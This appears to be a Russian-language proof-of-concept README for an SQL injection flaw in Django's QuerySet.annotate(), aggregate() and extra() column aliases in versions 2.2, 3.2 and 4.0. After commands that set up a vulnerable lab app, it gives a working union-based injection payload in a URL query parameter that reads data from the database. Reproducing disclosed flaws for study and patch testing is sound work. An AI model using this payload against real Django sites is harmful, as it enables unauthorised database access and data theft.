
Обнаружена проблема в Django 2.2 до 2.2.28, 3.2 до 3.2.13 и 4.0 до 4.0.4. Методы QuerySet.annotate(), aggregate() и extra() подвержены SQL-инъекции в псевдонимах столбцов через специально созданный словарь (с раскрытием словаря), передаваемый в качестве **kwargs.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
